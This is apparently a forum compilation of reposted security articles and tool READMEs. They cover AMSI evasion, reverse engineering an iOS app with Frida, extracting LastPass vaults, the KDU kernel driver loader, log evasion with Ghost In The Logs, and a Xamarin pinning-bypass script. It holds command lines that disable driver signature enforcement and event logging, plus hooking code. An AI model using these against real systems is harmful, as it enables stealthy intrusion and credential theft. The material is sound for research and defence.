For CircleCI integration, refer to our CircleCI wiki page, and for Jenkins integration, refer to our Jenkins wiki page for detailed instructions.

Use Case - Notification Channel and SIEM Integration

Deepfence logs and scanning reports can be routed to various SIEMs and notification channels by navigating to the Notifications screen.

For detailed instructions on integration with Slack, refer to our Slack wiki page.
For detailed instructions on integration with Sumo Logic, refer to our Sumo Logic wiki page.
For detailed instructions on integration with PagerDuty, refer to our PagerDuty wiki page.

API Support

Deepfence provides a suite of powerful APIs to control the features and to extract various reports from the platform. The documentation of the APIs is available here, along with sample programs for the Python and Go languages.
Security

Users are strongly advised to control access to the Deepfence Management Console, so that it is only accessible on port range 8000-8010 from those systems that have the Deepfence agent installed. Further, we recommend opening port 443 on the Deepfence Management Console only for those systems that need to use a web browser to access the Management Console. We periodically scan our own images for vulnerabilities, so pulling the latest images should always give you the most secure Deepfence images. In case you want to report a vulnerability in the Deepfence images, please reach out to us by email (community at deepfence dot io).

Support

Please file GitHub issues as needed.

Sursa: https://github.com/deepfence/ThreatMapper
10. DEF CON 27 Workshop

Microsoft is constantly adapting its security to counter new threats. Specifically, the introduction of the Microsoft Antimalware Scan Interface (AMSI) and its integration with Windows Defender has significantly raised the bar. In this hands-on class, we will learn the methodology behind obfuscating malware and avoiding detection. Students will explore the inner workings of Windows Defender and learn to employ AMSI bypass techniques and obfuscate malware using Visual Basic (VB) and PowerShell. They will then identify and evade sandbox environments to ensure the payloads are masked when arriving at the intended target. The final capstone will tie all the concepts together.

In this workshop we will:
1. Introduce AMSI and explain its importance
2. Learn to analyze malware scripts before and after execution
3. Understand how to obfuscate code to avoid AMSI and Windows Defender
4. Detect and avoid sandbox environments

https://github.com/BC-SECURITY/DEFCON27
  11. Reverse Engineering the Australian Government’s Coronavirus iOS application

Richard Nelson Apr 6 · 5 min read

On the 29th of March, the Australian Government launched its Coronavirus app. It’s a pretty neat little app with lots of useful features, including data on the current number of COVID-19 cases in Australia, broken down by state. I’ve been wondering where this data is and how to access it programmatically. With a native application fetching this data, the answer must be inside! I found the process of discovery interesting, so I’ve documented my efforts in the hope that it’s of interest to others. The first thing I would try when presented with something like this is to simply proxy through an app like Burp Suite, Proxyman or mitmproxy. These are all capable of capturing HTTPS and secure WebSockets. I used mitmproxy in transparent proxy mode, setting up my device to use my MacBook as the router to force all traffic through it (not through the Proxy settings on the device). But when capturing, minimal traffic shows up (there’s a bit more on first app run and if refresh tokens or remote-config are required, but not a lot). Worse, the following appears:

Warn: 192.168.86.25:51981: Client Handshake failed. The client may not trust the proxy’s certificate for firestore.googleapis.com.

However, this does give a couple of good pieces of information: This app uses Firebase’s Firestore database. Maybe the data is there? Firestore has pretty good SSL cert pinning, because traditional off-the-shelf cert pinning removal didn’t appear to work. So the next step is to ssh into a jailbroken iPhone with the app installed and poke around a bit. The first thing I noticed was GoogleService-Info.plist in the root directory of the application. When integrating the Firebase SDK in an iOS application, it helpfully provides a plist file with all the configuration for your project, which gets embedded in the app for the SDK to read.
This contains project ids, API keys, etc. Useful: Good news: the Australian government doesn’t send application analytics off to Google willy-nilly. It also shows us the Firestore database URL. This is a good start, but we don’t know how the data is structured in Firestore (or even if it’s actually there). It could be in various collections and documents, so it requires more digging to find out what the names of those are before we can attempt to read the data for ourselves.

Filtered mangled symbols displayed from Ghidra

The next step was to extract the ipa from the device and have a look at any other configuration files, load it up in Ghidra and see if there’s anything glaring. This did present some useful info on how the app is structured — what View Controllers and View Models there are (and the name of the developer whose build machine it ran on), but there was nothing obvious in the strings section around collection or document paths, and sifting through the status view controller and co. started to become time-consuming. I also considered patching the binary to remove cert pinning, but there had to be an easier way first. In steps Frida. Frida allows us to dynamically trace, hook, and inject code at runtime. My thinking here was to hook the Firestore methods for retrieving collections and documents and print out the arguments. The first step was to confirm that these methods are called, which will hint that the app is actually using them for the app data. Fortunately I’ve used Firestore in my own project so was slightly familiar with the APIs. Using frida-trace, we can get it to show when these functions are called:

% frida-trace -U -m "*[FIR* *collection*]" -m "*[FIR* *document*]" -f au.gov.health.covid19
Instrumenting functions...
Started tracing 16 functions. Press Ctrl+C to stop.
/* TID 0x503 */
1651 ms -[FIRFirestore collectionWithPath:0xdb39cb061878d20a]
1659 ms -[FIRCollectionReference documentWithPath:0x2813caeb0]

This is great!
We can see here that it pulls a collection and a document from Firestore, but we can’t yet see the arguments. The same output occurs when tapping into the “Current status” section. These two functions both take strings as their only argument: the collection path and document respectively. So I wrote a Frida script to simply print them out:

Script to hook two Firebase methods

This results in the following:

% frida --no-pause -U -l coronavirus.js -f au.gov.health.covid19
[iPhone::au.gov.health.covid19]-> [FIRFireStore collectionWithPath:@"<redacted>"]
[FIRCollectionReference documentWithPath:@"<redacted>"]
**tap "Current status" section**
[FIRFireStore collectionWithPath:@"<redacted collection>"]
[FIRCollectionReference documentWithPath:@"<redacted document>"]

Now we have enough information to get the data ourselves: JavaScript. Don’t ask. The output of this is interesting: apart from the actual status data, there’s a whole lot of backend-for-frontend data for how the app should display sections from the second document. This is pretty neat, and how more and more applications are being developed. Interestingly, I cannot find any reference to a string of the collection with the numbers in the application. This could either be because it’s hidden on purpose, or because I didn’t look hard enough. Either way, it doesn’t really matter.

Conclusion & Application

We can now use this to, for example, write a Slack bot that sends updates as soon as new data is in Firestore. Using Google’s Firestore is an interesting choice, and it’s nice to see it used well in what I presume is a heavily used application. This app is well written, and doesn’t look like it was something very quickly thrown together and rushed to the App Store (perhaps it was, well done). Inspecting the network traffic was a problem, and I went down a few rabbit holes (e.g. trying to use my JWT token from my application to use the Firestore REST APIs) that aren’t documented here.
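One of those rabbit holes, the Firestore REST API, is worth sketching: once a project id, collection and document name are known, a document can be fetched over plain HTTPS. The names below are placeholders (the real ones are redacted above); only the URL shape follows Firestore's documented REST layout:

```python
# Build the Firestore REST URL for a single document, following the documented
# layout: /v1/projects/{project}/databases/(default)/documents/{collection}/{doc}
def firestore_doc_url(project_id, collection, document):
    return (
        "https://firestore.googleapis.com/v1/"
        f"projects/{project_id}/databases/(default)/documents/"
        f"{collection}/{document}"
    )

# Placeholder names -- the real project id, collection and document are
# redacted in the article above.
print(firestore_doc_url("example-project", "statuses", "current"))
```

Fetching that URL (with an API key or auth token where required) returns the document as JSON, which is all a Slack bot like the one mentioned below would need.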
I have almost no suggestions to the developers on how to improve things here. The API keys simply must be in the app in some fashion, so as long as the permissions and scope on them are suitable, it’s really not an issue. 👍 I’ve shown how we can reverse engineer an application in order to replicate functionality, or fetch application data for ourselves. When an app doesn’t require user authentication to fetch data, it’s always going to be possible for someone determined enough to inspect it. My advice is to simply go with the assumption that the client is always an untrusted environment. Ensure your APIs are secure on the server side and able to deal with various types of abuse. Sursa: https://medium.com/@wabz/reverse-engineering-the-australian-governments-coronavirus-ios-application-c08790e895e9
  12. Breaking LastPass: Instant Unlock of the Password Vault

April 6th, 2020 by Oleg Afonin
Category: «Elcomsoft News», «GPU acceleration», «Tips & Tricks»

Password managers such as LastPass are designed from the ground up to withstand brute-force attacks on the password database. Using encryption and thousands of hash iterations, the protection is made to slow down access to the encrypted vault that contains all of the user’s stored passwords. In this article, we’ll demonstrate how to unlock the LastPass password vault instantly, without running a lengthy attack.

LastPass

Introduced by Marvasol Inc (acquired by LogMeIn) in 2008, LastPass is one of the four most popular password managers. Similar to other password managers, LastPass is designed to store, manage and synchronize passwords, which helps users employ complex, unique and non-reusable passwords for their many online accounts without having to memorize all of them. LastPass offers desktop apps for Windows and macOS, as well as mobile apps for iOS and Android. More interestingly, LastPass can be installed on multiple platforms as a cross-platform browser extension in many popular browsers. LastPass collects and stores the user’s passwords in a local database. The database can be encrypted with a master password. Due to the sensitive nature of the information stored in the password vault, LastPass applies strong encryption and uses multiple rounds of hashing to slow down potential brute-force attacks. Similar to other password managers, LastPass may use different protection settings to protect password vaults on different platforms, desktop apps carrying the strongest protection and the Android app the weakest. Technically speaking, LastPass keeps all passwords along with other authentication credentials in a SQLite database.
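The "thousands of hash iterations" mentioned above is key stretching: each brute-force guess must pay the same iteration cost as a legitimate unlock. LastPass is known to use PBKDF2; the sketch below assumes PBKDF2-SHA256 with an illustrative salt and the iteration counts discussed in this article:

```python
import hashlib

# Key stretching: the master password goes through many PBKDF2 iterations,
# so every brute-force guess costs the attacker the same many iterations.
def derive_vault_key(master_password, salt, iterations):
    return hashlib.pbkdf2_hmac(
        "sha256", master_password.encode(), salt, iterations, dklen=32
    )

# Illustrative values: 100,100 iterations matches the Windows vault discussed
# below, 5,000 the Android one; the salt here is a placeholder.
key = derive_vault_key("correct horse battery staple", b"per-user-salt", 100_100)
print(key.hex())
```

Raising the iteration count from 5,000 to 100,100 makes each guess roughly twenty times more expensive, which is exactly the ratio visible in the attack speeds quoted below.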
The database is secured with a password which, in turn, is used to generate the encryption key after going through some 5,000 to about 100,000 rounds of hashing, depending on the platform. For security reasons, desktop platforms offer the best protection. The LastPass database we obtained from a Windows computer was protected with 100,100 hash iterations. Attacking the database directly would result in the following speeds: The attack speed of 15,500 passwords per second using a GeForce 2070 GPU is about average, offering reasonable protection of the password database if the user sets a long, complex master password that is not based on combinations of dictionary words. Since most customers use their mobile devices to access accounts and open documents, LastPass also offers mobile apps on both iOS and Android platforms. The common property of these platforms is the touch screen. Unlike physical keyboards, touch screens don’t have the “motor learning” property; as such, they aren’t the best when it comes to entering long and complex passwords. This results in simpler master passwords selected by users who frequently unlock their protected vaults on mobile devices. Touch ID or Face ID do help avoid typing in the master password, but authentication with a master password is still required from time to time. LastPass password databases can also be acquired from Android and iOS devices (file system level access required, with unc0ver or rootless extraction). On Android, LastPass uses weaker protection with only 5,000 rounds of hashing. Correspondingly, the attack speeds are significantly higher compared to the Windows version – yet obtaining root access or imaging the file system of an Android device may be difficult or impossible. The brute-force speed of LastPass password databases obtained from Android devices can reach some 309,000 passwords per second if one uses a single NVIDIA GeForce 2070 GPU. We consider this speed relatively high.
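These guess rates translate directly into recovery-time estimates: time is keyspace divided by rate. A quick average-case check (half the keyspace) with the 309,000 guesses/second Android figure, over an alphabet of digits plus lower- and uppercase letters (10 + 26 + 26 = 62 symbols):

```python
# Average-case days to brute-force a password of the given length over a
# 62-symbol alphabet (digits + lowercase + uppercase).
def avg_crack_days(length, guesses_per_second, alphabet=62):
    keyspace = alphabet ** length
    seconds = (keyspace / 2) / guesses_per_second  # average: half the keyspace
    return seconds / 86_400  # seconds per day

# 309,000 guesses/s -- the Android-vault rate quoted above.
print(f"7 chars: {avg_crack_days(7, 309_000):.0f} days")   # about two months
print(f"6 chars: {avg_crack_days(6, 309_000):.1f} days")   # about a day
```

These rough numbers are consistent with the "less than three months" and "less than 3 days" figures given in the article for the full search.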
The attack of 309,000 passwords per second allows recovering complex master passwords in reasonable time. For example, a 7-character password containing digits, lowercase and uppercase letters but no special characters (typical for mobile devices) can be recovered in less than three months, while breaking a shorter 6-character password with the same properties can take less than 3 days. There is, however, one special case where no brute force is required to unlock the protected vault.

The Chrome Extension

LastPass can be installed as an extension in Google Chrome and the new Chromium-based Microsoft Edge browsers. The browser extension offers what’s arguably the most convenient way to automatically fill passwords on Web pages. Since most passwords protect online resources, many users skip the desktop app and use the Chrome extension exclusively. LastPass advertises the same level of security for protecting the user’s password database in the Chrome extension: Only you know your master password, and only you can access your vault. Your master password is never shared with LastPass. That’s why millions of people and businesses trust LastPass to keep their information safe. We protect your data at every step. Source We discovered that’s not always the case. In fact, it’s almost never the case. If the user installs the Chrome extension and protects the password vault with their master password, the extension may cache the user’s master password in the main database if the user selects the “Remember password” check box. Why use the “Remember password” option? Similar to other password managers, LastPass would otherwise require the user to authenticate each session by typing in their vault password (which, by design, is supposed to be a very long and complex one). Storing the vault password in the vault itself is a natural way to spare the typing.
However, it appears that LastPass does not adequately protect the master key if the “Remember password” option is selected: “The vulnerability (referred to as LastPass-Vul-1) lies in the insecure design of the master password remembering mechanism in LastPass. As shown in Figure 2, LastPass can even remember a user’s master password (with the BCPM username) into a local SQLite [40] database table LastPassSavedLogins2, allowing the user to be automatically authenticated whenever LastPass is used again.” Source

This vulnerability is still present in all recent versions of the LastPass Chrome extension (we’ve used LastPass 4.44.0 in Google Chrome 80.0.3987.146 running in Windows 10 x64). As a result, the forensic expert may be able to extract and decrypt the password vault instantly, without brute-forcing the master password, on one condition: the user had selected the “Remember password” check box.

Windows Data Protection API Not Used

One may argue that extracting passwords stored by the Google Chrome browser is similarly a one-click affair with third-party tools (e.g. Elcomsoft Internet Password Breaker). The difference between Chrome and LastPass password storage is that Chrome makes use of Microsoft’s Data Protection API, while LastPass does not. Google Chrome does, indeed, store the user’s passwords. Similar to third-party password managers, the Windows edition of the Chrome browser encrypts passwords when stored. By default, the encrypted database is not protected with a master password; instead, Chrome employs the Data Protection API (DPAPI) introduced way back in Windows 2000. DPAPI uses AES-256 to encrypt the password data. In order to access passwords, one must sign in with the user’s Windows credentials (authenticating with a login and password, PIN code, or Windows Hello). As a result, Google Chrome password storage has the same level of protection as the user’s Windows login.
This, effectively, enables someone who knows the user’s login and password, or hijacks the current session, to access the stored passwords. This is exactly what we implemented in Elcomsoft Internet Password Breaker. However, in order to extract passwords from Web browsers such as Chrome or Microsoft Edge, one must possess the user’s Windows login and password or hijack an authenticated session. Analyzing a ‘cold’ disk image without knowing the user’s password will not provide access to Chrome or Edge cached passwords. This is not the case for the LastPass Chrome extension (the desktop app is seemingly not affected). For the LastPass database, the attacker will not need the user’s Windows login credentials or macOS account password. All that’s actually required is the file containing the encrypted password database, which can be easily obtained from the forensic disk image. Neither Windows credentials nor the master password are required. macOS has a built-in secure storage, the so-called keychain. The Mac version of Chrome does not use the native keychain to store the user’s passwords; neither does the iOS version. However, Chrome does store the master password in the corresponding macOS or iOS keychain, effectively providing the same level of protection as the system keychain. Elcomsoft Password Digger can decrypt the macOS keychain provided that the user’s logon credentials (or the separate keychain password) are known.

Extracting the LastPass Master Password

In order to extract the user’s master password protecting the LastPass password database, we’ll use Elcomsoft Distributed Password Recovery. The LastPass Chrome extension stores the protected vault at the following path (Windows 10):

Windows: %UserProfile%\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0

Launch Elcomsoft Hash Extractor (part of Elcomsoft Distributed Password Recovery) and open the file referenced above.
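To locate that file programmatically, the quoted path can be expanded with a short Python helper. This is an illustrative sketch of ours, not part of the Elcomsoft tooling, and %UserProfile% only expands on a Windows host:

```python
import os

# The LastPass Chrome-extension vault path quoted above (Windows 10).
VAULT_DIR = (r"%UserProfile%\AppData\Local\Google\Chrome\User Data\Default"
             r"\databases\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0")

def vault_path():
    # os.path.expandvars resolves %UserProfile% on Windows; on other systems
    # the variable is left untouched, so run this on the target host.
    return os.path.expandvars(VAULT_DIR)

print(vault_path())
```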
Important: you may either access files of the currently logged in user or extract information from the disk image. The tool will automatically extract the hash file. Save the *.esprlp2 (multiple accounts) or *.esprlp (single account) hash file and open that file in Elcomsoft Distributed Password Recovery. Note: instant recovery is only available if the master password was saved. Select an account to extract the password from. Run the attack. Elcomsoft Distributed Password Recovery will find and display the master password in a matter of seconds regardless of how long and complex the master password is. Sursa: https://blog.elcomsoft.com/2020/04/breaking-lastpass-instant-unlock-of-the-password-vault/
  13. KDU Kernel Driver Utility

System Requirements

x64 Windows 7/8/8.1/10; Administrative privilege is required.

Purpose and Features

The purpose of this tool is to give a simple way to explore the Windows kernel/components without doing a lot of additional work or setting up a local debugger. It features:

Protected Processes Hijacking via Process object modification;
Driver Signature Enforcement Overrider (similar to DSEFix);
Driver loader for bypassing Driver Signature Enforcement (similar to TDL/Stryker);
Support of various vulnerable drivers used as functionality "providers".

Usage

KDU -ps ProcessID
KDU -map filename
KDU -dse value
KDU -prv ProviderID
KDU -list

-prv - optional, select vulnerability driver provider;
-ps - modify process object of given ProcessID;
-map - load input file as code buffer to kernel mode and run it;
-dse - write user defined value to the system DSE state flags;
-list - list currently available providers.

Example:
kdu -ps 1234
kdu -map c:\driverless\mysuperhack.sys
kdu -prv 1 -ps 1234
kdu -prv 1 -map c:\driverless\mysuperhack.sys
kdu -dse 0
kdu -dse 6

Run on Windows 10 20H2 (precompiled version)
Compiled and run on Windows 8.1
Run on Windows 7 SP1 fully patched (precompiled version)
Run on Windows 10 19H2 (precompiled version, SecureBoot enabled)

Limitations of -map command

Due to the unusual way of loading, which does not involve the standard kernel loader but instead overwrites already loaded modules with shellcode, there are some limitations:

Loaded drivers MUST BE specially designed to run as "driverless". That means you cannot use parameters specified at your DriverEntry, as they won't be valid. It also means you cannot load arbitrary drivers, only specially designed ones, unless you alter the shellcode responsible for driver mapping.

No SEH support for target drivers. There is no SEH code in x64. Instead, there is a table of try/except/finally regions which must be in the executable image, described by a pointer in the PE header.
If an exception occurs, the system handler will first look up which module it happened in. Mapped drivers are not inside the Windows-controlled list of drivers (PsLoadedModulesList - PatchGuard protected), so nothing will be found and the system will simply crash.

No driver unloading. Mapped code can't unload itself; however, you can still release all resources allocated by your mapped code. DRIVER_OBJECT->DriverUnload should be set to NULL.

Only ntoskrnl imports are resolved, everything else is up to you. If your project needs another module dependency, then you have to rewrite this loader part.

Several Windows primitives are banned by PatchGuard from use by dynamic code. Because of the unusual way of loading, a mapped driver won't be inside PsLoadedModulesList. That means any callback registered by such code will have its handler located in memory outside this list. PatchGuard has the ability to check whether the registered callbacks point to valid loaded modules or not, and will BSOD with "Kernel notification callout modification" if such dynamic code is detected. In general, if you want to know what you should not do in the kernel, look at https://github.com/hfiref0x/KDU/tree/master/Source/Examples/BadRkDemo which contains a few examples of forbidden things.

Kernel traces note

This tool does not change (and this won't change in the future) the internal Windows structures MmUnloadedDrivers and/or PiDDBCacheTable. That's because:

KDU is not designed to circumvent third-party security software or various dubious crapware (e.g. anti-cheats);
These data can be a target for PatchGuard protection in the next major Windows 10 update.

You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware.
Currently Supported Providers

Intel Network Adapter Diagnostic Driver of version 1.03.0.7;
RTCore64 driver from MSI Afterburner of version 4.6.2 build 15658 and below;
Gdrv driver from various Gigabyte TOOLS of undefined version;
ATSZIO64 driver from ASUSTeK WinFlash utility of various versions;
MICSYS MsIo (WinIo) driver from Patriot Viper RGB utility of version 1.0;
GLCKIO2 (WinIo) driver from ASRock Polychrome RGB of version 1.0.4;
EneIo (WinIo) driver from G.SKILL Trident Z Lighting Control of version 1.00.08;
WinRing0x64 driver from EVGA Precision X1 of version 1.0.2.0;
EneTechIo (WinIo) driver from Thermaltake TOUGHRAM software of version 1.0.3.

More providers may be added in the future.

How it works

It uses a driver known to be vulnerable, taken from legitimate software, to access arbitrary kernel memory with read/write primitives. Depending on the command, KDU will either work like TDL/DSEFix or modify kernel mode process objects (EPROCESS). When in -map mode, KDU will use a third-party signed driver from Sysinternals Process Explorer and hijack it by placing a small loader shellcode inside its IRP_MJ_DEVICE_CONTROL/IRP_MJ_CREATE/IRP_MJ_CLOSE handler. This is done by overwriting the physical memory where the Process Explorer dispatch handler is located and triggering it by calling the driver IRP_MJ_CREATE handler (a CreateFile call). Next, the shellcode will map the input driver as a code buffer to kernel mode and run it with the current IRQL at PASSIVE_LEVEL. After that, the hijacked Process Explorer driver will be unloaded together with the vulnerable provider driver. This entire idea comes from the malicious software of the mid-2000s known as rootkits.

Build

KDU comes with full source code. In order to build from source you need Microsoft Visual Studio 2019 or later. For driver builds you need Microsoft Windows Driver Kit 10 or above.

Support and Warranties

Using this program might crash your computer with a BSOD.
Compiled binary and source code are provided AS-IS in the hope they will be useful, BUT WITHOUT WARRANTY OF ANY KIND.

Third party code usage

TinyAES, https://github.com/kokke/tiny-AES-c

References

DSEFix, https://github.com/hfiref0x/DSEFix
Turla Driver Loader, https://github.com/hfiref0x/TDL
Stryker, https://github.com/hfiref0x/Stryker
Unwinding RTCore, https://swapcontext.blogspot.com/2020/01/unwinding-rtcore.html
CVE-2019-16098, https://github.com/Barakat/CVE-2019-16098
CVE-2015-2291, https://www.exploit-db.com/exploits/36392
CVE-2018-19320, https://seclists.org/fulldisclosure/2018/Dec/39
ATSZIO64 headers and libs, https://github.com/DOGSHITD/SciDetectorApp/tree/master/DetectSciApp
ATSZIO64 ASUS Drivers Privilege Escalation, https://github.com/LimiQS/AsusDriversPrivEscala
CVE-2019-18845, https://www.activecyber.us/activelabs/viper-rgb-driver-local-privilege-escalation-cve-2019-18845
DEFCON27: Get off the kernel if you cant drive, https://eclypsium.com/wp-content/uploads/2019/08/EXTERNAL-Get-off-the-kernel-if-you-cant-drive-DEFCON27.pdf

Wormhole drivers code

They are used in multiple products from hardware vendors, mostly in unmodified state. They all break the OS security model and are additionally bugged. The links are provided for educational purposes, as examples of how not to write your drivers. Note that the following GitHub accounts have nothing to do with this code; they have merely forked or uploaded it.

WinIo 3.0 BSOD/CVE generator, https://github.com/starofrainnight/winio/blob/master/Source/Drv/WinIo.c
WinRing0 BSOD/CVE generator, https://github.com/QCute/WinRing0/blob/master/dll/sys/OpenLibSys.c

Authors

(c) 2020 KDU Project

Sursa: https://github.com/hfiref0x/KDU
  14. Ghost In The Logs

This tool allows you to evade Sysmon and Windows event logging; my blog post about it can be found here.

Usage

You can grab the latest release here.

Starting off

Once you've got the latest version, execute it with no arguments to see the available commands:
$ gitl.exe

Loading the hook
$ gitl.exe load

Enabling the hook (disabling all logging)
$ gitl.exe enable

Disabling the hook (enabling all logging)
$ gitl.exe disable

Get status of the hook
$ gitl.exe status

Prerequisites

High-integrity administrator privileges

Credits

Huge thanks to:
hfiref0x for the amazing KDU
everdox for the super cool InfinityHook

Sursa: https://github.com/bats3c/ghost-in-the-logs/
  15. Bypassing Xamarin Certificate Pinning on Android

by Alexandre Beaulieu | Apr 6, 2020

Xamarin is a popular open-source and cross-platform mobile application development framework owned by Microsoft, with more than 13M total downloads. This post describes how we analyzed an Android application developed in Xamarin that performed HTTP certificate pinning in managed .NET code. It documents the method we used to understand the framework and the Frida script we developed to bypass the protections to man-in-the-middle (MITM) the application. The script’s source code, as well as a sample Xamarin application, are provided for testing and further research.

When no Known Solution Exists

During a recent mobile application engagement, we ran into a challenging hurdle while setting up an HTTPS man-in-the-middle with Burp. The application under test was developed with the Xamarin framework and all our attempts at bypassing the certificate pinning implementation seemed to fail. Using one of the several available pinning bypass Frida scripts, we were able to intercept traffic to some telemetry sites, but the actual API calls of interest were not intercepted. Searching the Internet for similar work led us to a Frida library, frida-mono-api, which adds basic capabilities to interface with the Mono runtime, and an article describing how to exfiltrate request signing keys in Xamarin/iOS applications. With the lack of an end-to-end solution, it quickly started to feel like a DIY moment.

Building a Test Environment

The first step taken to tackle the problem was to learn as much as possible about Xamarin, Mono and Android by re-creating a very simple application using the Visual Studio 2019 project template and implementing certificate pinning. This approach is interesting for multiple reasons:

Learn Xamarin from a developer’s perspective;
Solidify understanding of the framework;
Reading documentation will be required regardless;
Sources are available for debugging.
An additional benefit was that the application developed as part of this exploration phase could be used for demonstration purposes and to reliably validate our attempts to bypass certificate pinning. For this reason alone, the time spent upfront on development was more than worth it. The logical progression towards a working bypass can be outlined as follows:

Identify the interfaces that allow customizing the certificate validation routines;
Identify how they are used by typical code bases;
Determine how to alter them at runtime in a stable fashion;
Write a proof of concept script and test it against the demo application.

Another important objective that we had with this work was that any improvements towards Mono support in Frida should be a contribution to existing projects.

Down the Rabbit Hole

After setting up an Android development environment inside a Windows VM and following along with the Xamarin Getting Started guide, we were able to build and sign a basic Android application. With the application working, we implemented code simulating a certificate pinning routine, as shown in listing 1: a handler that flags all certificates as invalid. If we’re able to bypass this handler, then it implies that we should also be able to bypass a handler that verifies the public key against a hardcoded one.

Listing 1 – The simplest certificate “validation” handler.

static class App
{
    // Global HttpClient as per MSDN:
    // https://docs.microsoft.com/en-us/dotnet/api/system.net.http.httpclient
    public static HttpClient Http { get; }

    static App()
    {
        var h = new HttpClientHandler();
        h.ServerCertificateCustomValidationCallback = ValidateCertificate;
        Http = new HttpClient(h);
    }

    // This would normally check the public key against a hardcoded key.
    // Here we simulate an invalid certificate by always returning false.
    private static bool ValidateCertificate(object sender, X509Certificate certificate,
        X509Chain chain, SslPolicyErrors sslPolicyErrors) => false;
}

// ...
// Elsewhere in the code.
private async void MakeHttpRequest(object obj)
{
    // ...
    var r = await App.Http.GetAsync("https://www.example.org");
    // ...
}

Xamarin Concepts

Xamarin is designed to provide cross-platform support for Android and iOS and to minimize code duplication as much as possible. The UI code uses Microsoft’s Windows Presentation Foundation (WPF), which is an arguably nice way to program frontend code. There are two major components in any given Xamarin application: a shared library with the common functionality that does not rely on native operating system features, and a native application launcher project specific to each supported target operating system. In practice, this means that there are at least three projects in most Xamarin applications: the shared library, an Android launcher, and an iOS launcher. Application code is written in C# and uses the .NET Framework implementation provided by Mono. The code output is generated as a regular .NET assembly (with the .dll extension) and can be decompiled reliably (barring obfuscation) with most type information kept intact using a decompiler such as dnSpy. Xamarin has support for three compilation models provided by the underlying Mono framework:

Just-in-Time (JIT): Code is compiled lazily as required
Partial Ahead-of-Time compilation (AOT): Code is natively compiled ahead-of-time during build for compiler-selected methods
Full AOT: All Intermediate Language (IL) code is compiled to native machine code (required for iOS)

The Mono Runtime

The Mono runtime is responsible for managing the memory heaps, performing garbage collection, JIT-compiling methods when needed, and providing native functionality access to managed C# code. The runtime tracks metadata about all managed classes, methods, objects, fields, and other state from the Xamarin application. It also exports a native API that enables native code to interact with managed code.
While most of these methods are documented, some of them have empty or incomplete documentation strings, and diving into the codebase proved necessary multiple times while developing the Frida script. Mono uses a tiered compilation process, which will become relevant later as we describe the implementation of certificate pinning. In the pure JIT case, a method starts off as IL bytecode, which gets a compilation pass on the initial call. The resulting native code is referred to as the tier0 code and is cached in memory for re-use. When a method is deemed critical, the JIT compiler can decide to optimize it and recompile it using more aggressive optimizations. Mono is in fact much more complex than described here, but this overview covers the basics needed to understand the Frida script.

Hijacking Certificate Validation Callbacks

.NET has evolved over time and there are two entry points to override certificate validation routines, depending on whether .NET Framework or .NET Core is being used. Mono has recently moved to .NET Core APIs, rendering the .NET Framework method ineffective. Prior to .NET Core (and Mono 6.0), validation occurs through System.Net.ServicePointManager.ServerCertificateValidationCallback, which is a static property containing the function to call when validating a certificate. All HttpClient instances will call the same function, so only one function needs to be hooked. Starting with .NET Core, however, the HTTP stack has been refactored such that each HttpClient has its own HttpClientHandler exposing a ServerCertificateCustomValidationCallback property. This handler is injected into the HttpClient at construction time and is frozen after the first HTTP call to prevent modification. This scenario is much more difficult, as it requires knowledge of every HttpClient instance and its location in memory at runtime.
Listing 2 – Certificate validation callback setter preventing callback hijacking

// https://github.com/mono/mono/blob/mono-6.8.0.96/mcs/class/System.Net.Http/HttpClientHandler.cs#L93
class HttpClientHandler {
    public Func<HttpRequestMessage, X509Certificate2, X509Chain, SslPolicyErrors, bool>
        ServerCertificateCustomValidationCallback {
        get {
            return (_delegatingHandler.SslOptions.RemoteCertificateValidationCallback?
                        .Target as ConnectHelper.CertificateCallbackMapper)?
                        .FromHttpClientHandler;
        }
        set {
            ThrowForModifiedManagedSslOptionsIfStarted (); // <---- Validation here
            _delegatingHandler.SslOptions.RemoteCertificateValidationCallback = value != null
                ? new ConnectHelper.CertificateCallbackMapper(value).ForSocketsHttpHandler
                : null;
        }
    }
}

As seen in the previous listing, setting the callback after a request has been sent will throw an exception and most likely cause the application to crash. Fortunately for us, the base class of HttpClient is HttpMessageInvoker, which contains a mutable reference to the HttpClientHandler that will perform the certificate validation, so it is possible to safely change the whole handler:

Listing 3 – HttpMessageInvoker request dispatch mechanism

// https://github.com/mono/mono/blob/mono-6.8.0.96/mcs/class/System.Net.Http/System.Net.Http/HttpMessageInvoker.cs
public class HttpMessageInvoker : IDisposable
{
    protected private HttpMessageHandler handler;
    readonly bool disposeHandler;

    // ...

    public virtual Task SendAsync (HttpRequestMessage request, CancellationToken cancellationToken)
    {
        return handler.SendAsync (request, cancellationToken);
    }
}

Hooking Managed Methods

In the ServicePointManager case, intercepting the callback is as simple as hooking the static property's get and set methods, so it will not be covered explicitly, but it is included with the bypass Frida script we are providing. Let's focus on the more interesting HttpClientHandler case, which requires more than just method hooking.
The idea is to replace the HttpClientHandler instance with one that we control, which restores the default validation routine. To do this, we can hook the HttpMessageInvoker.SendAsync implementation and replace the handler immediately before it gets called. Now, SendAsync is a managed method, so it could be in any given state at any given moment:

- Not yet JIT compiled: the native code for hooking does not exist
- Tier0 compiled: we can hook the method if we can find its address
- AOT compiled: the method is in a memory-mapped native image

To make matters trickier, if the Mono runtime were to decide to optimize a method that we hooked, our hook would likely be removed in the newly generated code. Thankfully, the native function mono_compile_method allows us to take a class method and force the JIT compilation process. However, it is not clear whether the resulting method is tier0 compiled or optimized, so there could still potentially be issues with optimizations. The return value of mono_compile_method is a pointer to the cached native code corresponding to the original method, making it very straightforward to patch using existing Frida APIs.

Putting the Pieces Together

We forked the frida-mono-api project as a starting point and added some new export signatures, along with the JIT compilation export and a MonoApiHelper method to wrap the boilerplate required to hook managed methods. The resulting code is very clean and in theory should allow hooking any managed method:

Listing 4 – Support for managed method hooking in frida-mono-api

function hookManagedMethod(klass, methodName, callbacks) {
    // Get the method descriptor corresponding to the method name.
    let md = MonoApiHelper.ClassGetMethodFromName(klass, methodName);
    if (!md) throw new Error('Method not found!');
    // Force a JIT compilation to get a pointer to the cached native code.
    let impl = MonoApi.mono_compile_method(md);
    // Use the Frida interceptor to hook the native code.
    Interceptor.attach(impl, {...callbacks});
}

With the ability to hook managed methods, we can implement the approach described above and test the script on a rooted Android device.

Listing 5 – Final certificate pinning bypass script

import { MonoApiHelper, MonoApi } from 'frida-mono-api'
const mono = MonoApi.module

// Locate System.Net.Http.dll
let status = Memory.alloc(0x1000);
